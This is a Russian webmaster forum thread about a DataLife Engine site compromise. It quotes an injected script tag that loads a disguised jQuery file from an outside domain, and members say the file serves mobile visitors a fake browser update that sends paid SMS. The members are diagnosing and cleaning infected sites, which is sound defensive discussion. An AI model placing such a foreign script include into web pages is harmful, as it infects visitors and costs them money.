X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Появился непонятный код, я в непонятках...
Artamos
Artamos
Topic Starter сообщение 18.3.2012, 0:07; Ответить: Artamos
Сообщение #1


Стоял сайт на DLE 9.3, пол года стоял себе спокойно, но ту я с дуру решил обновить до DLE 9.5 и через некоторое время все заголовки и значения ссылок просто стерлись из шаблона. Полез в код, сразу бросился в глаза странный код:
<script src="http://ru-phone.com/jquery-1.7.1.min.js"></script>

Точно знаю, что его раньше не было, но не понимаю откуда он мог появиться. Из дополнительных модулей на сайте имеется только форум bullet energy и всё. Все файлы рыть не хочется, поэтому спрашиваю, не встречалась ли у других такая проблема? И как могли залезть в DLE 9.5, все права расставлены, ничего лишнего специально не подключал.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PostBrigada
PostBrigada
сообщение 18.3.2012, 0:18; Ответить: PostBrigada
Сообщение #2


такая же фигня была на днях. но перед этим вылечил сайт от вирусов редиректоров, которые ниодин антивирь не видел кроме аваста, я думаю на них. Скрипт такой же появился, пока не удаляю, не знаю что делать


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 18.3.2012, 0:23; Ответить: fioru
Сообщение #3


Зря не удаляете... эта фигня скорее всего отнимает у Вас мобильный трафик устанавливая на телефон посетителя прогу рассылающую платные смски

Сообщение отредактировал fioru - 18.3.2012, 0:24
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Artamos
Artamos
Topic Starter сообщение 18.3.2012, 0:34; Ответить: Artamos
Сообщение #4


Почитал комменты тут и видимо кто-то нашел уязвимость в ДЛЕ 9.5 раз начались взломы даже официальных версий, но celsoft как всегда репу чешет...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 18.3.2012, 0:37; Ответить: Electric
Сообщение #5


(Artamos @ 17.3.2012, 23:07) *
<script src="http://ru-phone.com/jquery-1.7.1.min.js"></script>
Удаляйте не раздумывая.
Все пути должны быть локальными.
Если скрипт грузится с другого сервера - 90% что это вирус.
Просто так вы его не отловите так как он проверяет по User Agent через какой браузер загружается страница.
Если это мобильный браузер - сразу предлагает "обномить устаревшую миниоперу".
И при этом ставит на телефон програму для рассылки смс на короткие платные номера...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
firsov
firsov
сообщение 18.3.2012, 0:38; Ответить: firsov
Сообщение #6


у меня тоже такая же беда была. я базу данных на комп перекинул, авастом потом поубивал все эти скрипты, там левых файлов Js появляется целый вагон, потом обратно залил на хост и пароли до кучи от FTP сменил. после данных манипуляций в админке пропал шаблон, ваще короче пусто и новости добавить не могу, тоже пустая страница. dry.gif


--------------------
Автоматический обмен валют Webmoney - Visa/MasterCard, АльфаБанк, Втб24, СберБанк
FOREX OPTIMUM Лучшая партнерская программа 2012 года
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
tomaas
tomaas
сообщение 18.3.2012, 0:48; Ответить: tomaas
Сообщение #7


я бы htaccess проверил
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PostBrigada
PostBrigada
сообщение 18.3.2012, 0:49; Ответить: PostBrigada
Сообщение #8


(Artamos @ 18.3.2012, 0:34) *
кто-то нашел уязвимость в ДЛЕ 9.5 раз начались взломы

9.2 стоит ДЛЕ. Все JS были заражены, так как их немеренно, тупо перезалил двиг и шаблон. Кстати, плюсом EVAL сидел еще, проверьете

имя сайта/engine/skins/codemirror/js/code.js - последние строки непонятного кода со словом eval

И поставьте аваст последний, он ругаеться сразу на эти вещи, даже хваленый каспер молчит

Сообщение отредактировал PostBrigada - 18.3.2012, 0:50


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Artamos
Artamos
Topic Starter сообщение 18.3.2012, 0:59; Ответить: Artamos
Сообщение #9


(Electric @ 18.3.2012, 0:37) *
Удаляйте не раздумывая.

Удалить-то не проблема, только этот код скоро снова появится. Посмотрел другие сайты на хостинге, все чистые - значит проблема именно в ДЛЕ, а не серверном ПО. Судя по тому, что заражены все шаблоны и характеру замены можно утверждать - распространение вредоносного кода происходит автоматизированно, т.е. пароли с компьютера никто не крал. Уже хорошо, круг поиска сузился, остается только найти уязвимость smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PostBrigada
PostBrigada
сообщение 18.3.2012, 1:07; Ответить: PostBrigada
Сообщение #10


(Artamos @ 18.3.2012, 0:59) *
пароли с компьютера никто не крал


Большая вероятность, что сами затащили, я проверился и нашел неприятный букет. До этого поползал на хосте

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Почистить код на сайте
1 Timka 1090 2.1.2021, 1:13
автор: 0pium
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыВы мне код, я вам как - делать не надо.
0 fedornabilkin 942 18.9.2020, 18:59
автор: fedornabilkin
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыAdobe muse: Не могу разместить нужный мне код сразу после Body
0 Evg82 3829 20.6.2020, 10:24
автор: Evg82
Открытая тема (нет новых ответов) Повесить мой код Адсенса на ваш сайт на 1-2 дня
4 WildWeb8 3699 18.7.2018, 20:04
автор: startseo
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыНужен человек, который почистит код от ненужного мусора. (Вордпресс)
51 timkab_mw 6812 2.8.2017, 12:01
автор: timkab_mw


 



RSS Текстовая версия Сейчас: 28.3.2024, 21:42
Дизайн